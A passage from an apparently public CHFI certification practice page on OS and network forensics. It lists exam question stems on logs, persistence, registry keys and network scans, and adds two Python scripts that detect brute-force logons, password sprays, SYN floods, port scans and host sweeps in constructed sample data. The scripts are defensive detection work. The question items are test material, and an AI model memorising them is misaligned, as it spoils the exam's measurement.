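Questions 166, 181 and 196 all describe the same Security log shape: a burst of Event ID 4625 (failed logon) for one account, sometimes followed by a 4624 (successful logon). The script below is an added example for this page, not EC-Council or Courseiva code. It correlates exported events per account to answer the question those items ask (did the burst succeed, and from where), and separately detects a password spray, where one source fails once against many accounts and no single account ever shows a burst. The event rows are constructed rather than exported from a real system, and the window and thresholds are assumptions.

```python
"""Correlate Windows Security events 4625 and 4624 into attack findings.

Added example for this page, not EC-Council or Courseiva code. Events are
constructed; thresholds and the correlation window are assumptions.
"""
from collections import defaultdict
from datetime import datetime, timedelta

FAILED_LOGON, SUCCESSFUL_LOGON = 4625, 4624
WINDOW = timedelta(minutes=5)    # assumed correlation window
MIN_FAILURES = 5                 # assumed burst threshold per account
MIN_SPRAY_ACCOUNTS = 5           # assumed distinct-account threshold per source

# Constructed rows: (EventID, UTC timestamp, TargetUserName, IpAddress).
SAMPLE_EVENTS = [
    # brute force against jdoe from rotating sources, then a success from the last one
    (4625, "2024-05-01T02:00:01", "jdoe", "198.51.100.7"),
    (4625, "2024-05-01T02:00:03", "jdoe", "198.51.100.8"),
    (4625, "2024-05-01T02:00:05", "jdoe", "198.51.100.9"),
    (4625, "2024-05-01T02:00:07", "jdoe", "198.51.100.10"),
    (4625, "2024-05-01T02:00:09", "jdoe", "198.51.100.11"),
    (4624, "2024-05-01T02:00:12", "jdoe", "198.51.100.11"),
    # one mistyped password, then success: benign
    (4625, "2024-05-01T08:15:00", "asmith", "10.0.0.21"),
    (4624, "2024-05-01T08:15:20", "asmith", "10.0.0.21"),
    # password spray: one source, one attempt each against five accounts
    (4625, "2024-05-01T09:00:00", "u1", "203.0.113.44"),
    (4625, "2024-05-01T09:00:01", "u2", "203.0.113.44"),
    (4625, "2024-05-01T09:00:02", "u3", "203.0.113.44"),
    (4625, "2024-05-01T09:00:03", "u4", "203.0.113.44"),
    (4625, "2024-05-01T09:00:04", "u5", "203.0.113.44"),
]


def parse_events(rows):
    """Give each row a real datetime so events can be sorted and windowed."""
    return [{"id": eid, "ts": datetime.fromisoformat(ts), "user": user, "ip": ip}
            for eid, ts, user, ip in rows]


def classify_account_attacks(events, window=WINDOW, min_failures=MIN_FAILURES):
    """Per account: find a burst of failures inside `window`; if a 4624 for the same
    account follows within `window` of the last failure, the burst succeeded."""
    by_user = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        by_user[ev["user"]].append(ev)
    findings = {}
    for user, evs in by_user.items():
        failures = [e for e in evs if e["id"] == FAILED_LOGON]
        for i, first in enumerate(failures):
            burst = [f for f in failures[i:] if f["ts"] - first["ts"] <= window]
            if len(burst) < min_failures:
                continue
            last_fail = burst[-1]["ts"]
            success = next((e for e in evs if e["id"] == SUCCESSFUL_LOGON
                            and last_fail < e["ts"] <= last_fail + window), None)
            findings[user] = {
                "failures": len(burst),
                "source_ips": sorted({f["ip"] for f in burst}),
                "succeeded": success is not None,
                "success_ip": success["ip"] if success else None,
            }
            break   # report the first burst per account
    return findings


def detect_password_spray(events, window=WINDOW, min_accounts=MIN_SPRAY_ACCOUNTS):
    """Per source IP: failures against >= min_accounts distinct accounts inside `window`."""
    by_ip = defaultdict(list)
    for ev in events:
        if ev["id"] == FAILED_LOGON:
            by_ip[ev["ip"]].append(ev)
    sprays = {}
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e["ts"])
        for i, first in enumerate(evs):
            users = {e["user"] for e in evs[i:] if e["ts"] - first["ts"] <= window}
            if len(users) >= min_accounts:
                sprays[ip] = sorted(users)
                break
    return sprays


if __name__ == "__main__":
    evs = parse_events(SAMPLE_EVENTS)
    for user, f in classify_account_attacks(evs).items():
        print(user, "brute force", "succeeded from " + f["success_ip"] if f["succeeded"] else "no success", f["source_ips"])
    for ip, users in detect_password_spray(evs).items():
        print(ip, "password spray against", users)
```

Rotating source IPs against one account (brute force) and one source against many accounts (spray) are both invisible if you only count 4625s per account, which is why the two detectors are separate. In a real export also keep the 4625 Status/SubStatus and the 4624 Logon Type: a burst of 0xC000006A (bad password) ending in a Logon Type 10 (RemoteInteractive) success reads very differently from a Logon Type 3 service account hiccup.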
197. During a forensic investigation of a compromised Linux server, you find the following entry in /var/log/auth.log: 'Mar 10 02:15:30 server sshd[1234]: Failed password for root from 10.0.0.5 port 54321 ssh2'. Which command would you use to extract all failed root login attempts from this log?
198. An investigator is analyzing a Windows 10 system suspected of malware persistence. Which registry key is commonly used by malware to achieve persistence by running a program at every user logon?
199. In network forensics, which tool is specifically designed for packet capture and analysis, allowing examiners to inspect individual packets and reconstruct network conversations?
200. During a forensic examination of a Mac system, an investigator needs to recover a historical record of file system events, such as file modifications and deletions. Which artifact should they examine?
201. An analyst is examining a PCAP file in Wireshark and notices a series of TCP SYN packets sent to multiple ports on a single IP address, with no subsequent SYN-ACK replies. What type of network activity does this indicate?
202. Which TWO of the following are Windows artifacts that can provide evidence of file execution, including timestamps and paths?
203. Which TWO of the following registry keys are commonly used to maintain persistence on Windows systems by automatically starting programs?
204. Which TWO of the following are common Linux log files that can be used for forensic analysis?
205. Which TWO of the following are forensic artifacts found on macOS systems that can help reconstruct user activity?
206. Which THREE of the following are indicators of a webshell compromise on a web server?
207. Which THREE of the following are Windows Event IDs that are particularly useful for investigating account logon activities?
208. Which THREE of the following are commonly used network forensic data sources?
209. Which TWO of the following are tools that can be used for timeline analysis in digital forensics?
210. Which THREE of the following are persistence mechanisms that can be used on Linux systems?
211. A forensic analyst reviews a Windows system for signs of malware persistence. Which TWO registry locations are commonly used to achieve persistence via auto-start programs?
212. During a Linux forensic investigation, an analyst examines the file /var/log/auth.log and finds repeated entries with 'Failed password for root from 192.168.1.200 port 22 ssh2'. Which TWO conclusions can the analyst draw from this evidence?
213. A security analyst captures network traffic and observes multiple TCP SYN packets sent to a range of IP addresses on port 445, followed by TCP RST packets after 15 seconds. Which THREE indicators suggest this is a network scan?
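Questions 170, 201 and 213 each show a burst of TCP SYNs, and the answer turns on which side sends what next: a SYN flood (many sources, one target port, SYN-ACKs retransmitted and never ACKed), a port scan (one source, many ports on one host, no completed handshakes) and a host sweep (one source, one port, many hosts, RST after a timeout). The script below is an added example for this page, not EC-Council or Courseiva code: it builds a constructed packet summary containing all three patterns plus one normal handshake, then runs one detector per pattern. Packets are constructed, not captured, and the thresholds are assumptions.

```python
"""Tell a SYN flood, a port scan and a host sweep apart from a packet summary.

Added example for this page, not EC-Council or Courseiva code. Packets are
constructed and thresholds are assumptions.
"""
from collections import defaultdict

# Packet record: (time_s, src, dst, sport, dport, flags); flags "S"=SYN, "SA"=SYN-ACK, "A"=ACK, "R"/"RA"=RST.


def build_sample():
    """Constructed capture: flood on 10.0.0.80:80, port scan of 10.0.0.20, sweep of 10.0.1.0/24:445."""
    pkts = []
    for i in range(20):   # flood: 20 spoofed sources, server (re)sends SYN-ACK 3x, nobody ACKs
        client, t = f"203.0.113.{i + 1}", i * 0.01
        pkts.append((t, client, "10.0.0.80", 40000 + i, 80, "S"))
        for delay in (0.001, 1.0, 3.0):
            pkts.append((t + delay, "10.0.0.80", client, 80, 40000 + i, "SA"))
    for j, port in enumerate(range(20, 35)):   # port scan: closed ports RST-ACK, open 22 SYN-ACK then scanner RST
        t = 100 + j * 0.05
        pkts.append((t, "198.51.100.5", "10.0.0.20", 50000 + j, port, "S"))
        if port == 22:
            pkts.append((t + 0.001, "10.0.0.20", "198.51.100.5", 22, 50000 + j, "SA"))
            pkts.append((t + 0.002, "198.51.100.5", "10.0.0.20", 50000 + j, 22, "R"))
        else:
            pkts.append((t + 0.001, "10.0.0.20", "198.51.100.5", port, 50000 + j, "RA"))
    for k in range(12):   # host sweep on 445: no answer, scanner gives up with RST after 15 s
        t, host = 200 + k * 0.02, f"10.0.1.{k + 10}"
        pkts.append((t, "198.51.100.9", host, 51000 + k, 445, "S"))
        pkts.append((t + 15.0, "198.51.100.9", host, 51000 + k, 445, "R"))
    pkts += [(300.0, "10.0.0.33", "10.0.0.80", 42000, 80, "S"),      # one legitimate handshake
             (300.001, "10.0.0.80", "10.0.0.33", 80, 42000, "SA"),
             (300.002, "10.0.0.33", "10.0.0.80", 42000, 80, "A")]
    return sorted(pkts)


def index_handshakes(pkts):
    """Key every handshake by (server, server_port, client, client_port)."""
    syns = defaultdict(set)      # (server, dport) -> {(client, cport)}
    synacks = defaultdict(int)   # handshake key -> SYN-ACK count; >1 means retransmission
    completed = set()            # handshake keys whose client sent the final ACK
    for _, src, dst, sport, dport, flags in pkts:    # pkts are time-ordered
        if flags == "S":
            syns[(dst, dport)].add((src, sport))
        elif flags == "SA":
            synacks[(src, sport, dst, dport)] += 1
        elif flags == "A" and (dst, dport, src, sport) in synacks:
            completed.add((dst, dport, src, sport))
    return syns, synacks, completed


def detect_syn_flood(pkts, min_sources=10, max_completion=0.1):
    """Many sources, almost no completed handshakes, and the server retransmitting SYN-ACKs."""
    syns, synacks, completed = index_handshakes(pkts)
    findings = {}
    for (server, port), attempts in syns.items():
        sources = {c for c, _ in attempts}
        if len(sources) < min_sources:
            continue
        done = sum((server, port, c, p) in completed for c, p in attempts)
        retrans = sum(n > 1 for (s, sp, _, _), n in synacks.items() if (s, sp) == (server, port))
        if done / len(attempts) <= max_completion and retrans:
            findings[(server, port)] = {"sources": len(sources), "attempts": len(attempts),
                                        "completed": done, "retransmitted_synacks": retrans}
    return findings


def detect_port_scans(pkts, min_ports=10):
    """One source probing many destination ports on one host."""
    per_pair = defaultdict(set)
    for _, src, dst, _, dport, flags in pkts:
        if flags == "S":
            per_pair[(src, dst)].add(dport)
    return {pair: sorted(ports) for pair, ports in per_pair.items() if len(ports) >= min_ports}


def detect_host_sweeps(pkts, min_hosts=10):
    """One source probing one port across many hosts; reports the SYN-to-RST gap when the scanner resets."""
    syn_time = defaultdict(dict)   # (client, dport) -> {host: syn time}
    gaps = defaultdict(list)
    for t, src, dst, _, dport, flags in pkts:
        if flags == "S":
            syn_time[(src, dport)][dst] = t
        elif flags == "R" and dst in syn_time.get((src, dport), {}):
            gaps[(src, dport)].append(t - syn_time[(src, dport)][dst])
    return {key: {"hosts": len(hosts),
                  "rst_after_s": round(sum(gaps[key]) / len(gaps[key]), 2) if gaps[key] else None}
            for key, hosts in syn_time.items() if len(hosts) >= min_hosts}


if __name__ == "__main__":
    pk = build_sample()
    print("flood:", detect_syn_flood(pk))
    print("port scans:", detect_port_scans(pk))
    print("host sweeps:", detect_host_sweeps(pk))
```

The flood detector keys on the target's behaviour (SYN-ACK retransmissions with a near-zero completion rate), which is the detail question 170 hinges on, while the scan detectors key on the scanner's fan-out. Tuples in this shape can be exported from a pcap with tshark's `frame.time_relative`, `ip.src`, `ip.dst`, `tcp.srcport`, `tcp.dstport` and `tcp.flags` fields; the flag letters here are a simplification of that numeric field.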
214. During a Windows forensic investigation, an analyst finds prefetch files with the .pf extension. Which TWO pieces of information can the analyst obtain from analyzing prefetch files?
215. A forensic analyst is examining a Mac system for evidence of malicious activity. Which THREE artifacts are commonly analyzed in macOS forensics?
216. A network security analyst reviews firewall logs and identifies a high volume of outbound DNS queries to a known malicious domain from multiple internal hosts. Which THREE actions should the analyst take immediately?
The OS and Network Forensics domain covers the key concepts tested in this area of the CHFI exam blueprint published by EC-Council. Courseiva provides free domain-focused practice, mock exams, missed-question review, and readiness tracking across all CHFI domains — no account required.
The Courseiva CHFI question bank contains 216 questions in the OS and Network Forensics domain. Click any question to see the full explanation and answer breakdown.
Start with a 10-question focused session to identify your baseline accuracy in this domain. Read every explanation — even for questions you answer correctly — to understand the reasoning. Once you score consistently above 80%, move to a 20–30 question session to confirm depth before moving to the next domain.
Yes — the session launcher on this page draws questions exclusively from the OS and Network Forensics domain. Choose 10, 20, 30, or 50 questions for a focused session, or click individual questions to review them one by one.